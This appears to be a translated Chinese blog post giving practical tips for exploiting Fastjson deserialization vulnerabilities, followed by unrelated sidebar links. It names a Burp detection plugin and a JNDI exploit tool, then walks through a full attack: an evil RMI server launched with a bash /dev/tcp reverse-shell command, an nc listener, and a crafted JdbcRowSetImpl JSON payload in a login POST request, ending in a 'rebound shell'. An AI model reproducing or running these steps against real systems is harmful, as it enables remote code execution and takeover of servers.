当前位置:网站首页>Fastjson vulnerability utilization techniques
Fastjson vulnerability utilization techniques
2022-06-24 16:08:00 【Bypass】
Every time I see json Data packets , Will inevitably think of Fastjson And vulnerabilities in multiple versions of it .
How to realize automatic detection and simplify attack steps , So as to improve the ability of vulnerability discovery , Make you more efficient Tips, Let's share with you .
01、 Automated vulnerability detection
Based on a BurpSuite Passive FastJson Test plug-in , This plug-in will help BurpSuite Coming in with json The request packet of data is detected .
Github Project address :
https://github.com/pmiaowu/BurpFastJsonScan
02、 Simplify attack steps
Here we can use a JNDI Service utilization tools , To simplify the fastjson Steps of vulnerability detection , Assist in vulnerability exploitation and penetration .
Github Project address :
https://github.com/wyzxxz/jndi_toolFstjson Exploit :
(1) Turn on RMI service
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"
(2) Set listening server
nc -lvvp 12345
(3) Construct request send payload
POST /login HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 111
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}
(4) Target system received POST request , Successful rebound shell.
边栏推荐
- Golang+redis distributed mutex
- Efficient tools commonly used by individuals
- Global and Chinese market of inverted syrup 2022-2028: Research Report on technology, participants, trends, market size and share
- The penetration of 5g users of operators is far slower than that of 4G. The popularity of 5g still depends on China Radio and television
- 【Prometheus】4. Monitoring cases
- 中国产品经理的没落:从怀恋乔布斯开始谈起
- One article explains Jackson configuration information in detail
- Mongodb Getting started Practical Tutoriel: Learning Summary Table des matières
- 安装ImageMagick7.1库以及php的Imagick扩展
- Global and Chinese market of music synthesizer 2022-2028: Research Report on technology, participants, trends, market size and share
猜你喜欢

Understanding openstack network

Recommend several super practical data analysis tools

【面试高频题】难度 3/5,可直接构造的序列 DP 题

存在安全隐患 部分冒险家混动版将召回

One article explains Jackson configuration information in detail
MySQL進階系列:鎖-InnoDB中鎖的情况
![[C language questions -- leetcode 12 questions] take you off and fly into the garbage](/img/ca/a356a867f3b7ef2814080fb76b9bfb.png)
[C language questions -- leetcode 12 questions] take you off and fly into the garbage

Linux record -4.22 MySQL 5.37 installation (supplementary)

Still worried about missing measurements? Let's use Jacobo to calculate the code coverage

Nifi from introduction to practice (nanny level tutorial) - environment
随机推荐
对深度可分离卷积、分组卷积、扩张卷积、转置卷积(反卷积)的理解
Three solutions for Jenkins image failing to update plug-in Center
Wechat official account debugging and natapp environment building
How to easily realize online karaoke room and sing "mountain sea" with Wang Xinling
One article explains Jackson configuration information in detail
企业安全攻击面分析工具
Golang+redis distributed mutex
Recommend several super practical data analysis tools
ZOJ - 4104 sequence in the pocket
[download attached] installation and simple use of Chinese version of awvs
ZOJ——4104 Sequence in the Pocket(思维问题)
April 30, 2021: there are residential areas on a straight line, and the post office can only be built on residential areas. Given an ordered positive array arr
如何轻松实现在线K歌房,与王心凌合唱《山海》
April 23, 2021: there are n cities in the TSP problem, and there is a distance between any two cities
Rush for IPO, Hello, I'm in a hurry
一文详解JackSon配置信息
2021-05-01: given an ordered array arr, it represents the points located on the X axis. Given a positive number k
Installer la Bibliothèque imagemagick 7.1 et l'extension imagick de PHP
安装ImageMagick7.1库以及php的Imagick扩展
Global and Chinese market for commercial barbecue smokers 2022-2028: Research Report on technology, participants, trends, market size and share